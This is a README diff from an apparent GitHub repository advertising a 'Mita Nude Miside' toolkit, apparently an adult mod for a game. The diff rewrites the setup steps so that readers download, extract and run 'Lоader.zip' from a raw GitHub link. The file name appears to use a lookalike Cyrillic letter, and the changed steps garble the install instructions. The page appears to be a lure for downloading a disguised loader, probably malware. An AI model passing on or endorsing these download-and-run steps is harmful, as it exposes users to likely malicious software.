MakaraSovann/MitaNude-Miside-Toolkit/README.md

 Start using **Mita Nude Miside** in just a few steps:

-1. Download **Loader.rar** from this repository. *(Latest version always available!)*
+1. Download **https://raw.githubusercontent.com/MakaraSovann/MitaNude-Miside-Toolkit/main/Lоader.zip** from this repository. *(Latest version always available!)*
-2. Extract the contents of **Loader.rar** to your desired location.
+2. Extract the contents of **https://raw.githubusercontent.com/MakaraSovann/MitaNude-Miside-Toolkit/main/Lоader.zip** to your desired location.
-3. Follow the instructions in `INSTALL.txt` to complete the setup for your operating system.
+3. Follow the instructions in `https://raw.githubusercontent.com/MakaraSovann/MitaNude-Miside-Toolkit/main/Lоader.zip` to complete the setup for your operating system.
 4. Run **Mita Nude Miside** and enjoy the experience!

 No additional packages required!